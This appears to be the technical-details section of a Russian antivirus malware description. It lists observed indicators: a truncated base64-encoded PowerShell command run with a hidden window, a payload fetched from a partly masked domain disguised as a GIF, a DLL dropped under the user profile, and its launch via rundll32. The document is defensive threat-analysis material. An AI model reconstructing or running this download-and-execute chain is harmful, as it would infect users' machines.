Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABRAF8AcQAwAHoAMwA4AD0AKAAoACcARgAnACsAJwBrAGUAdwBrAHIAJwApACsAJwBkACcAKQA7ACYAKAAnAG4AZQAnACsAJwB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAEUAbgB2ADoAdQBTAEUAcgBQAHIAbwBGAGkAbA...
- %HOMEPATH%\zju3ugw\evpqbx8\ozoe1jq.dll
- http://am####agherian.com/nm66tqz.gif
- DNS ASK am####agherian.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABRAF8AcQAwAHoAMwA4AD0AKAAoACcARgAnACsAJwBrAGUAdwBrAHIAJwApACsAJwBkACcAKQA7ACYAKAAnAG4AZQAnACsAJwB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAEUAbgB2ADoAdQBTAEUAcgBQAHIAbwBGAGkAbA...' (со скрытым окном)
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\Zju3ugw\Evpqbx8\Ozoe1jq.dll 0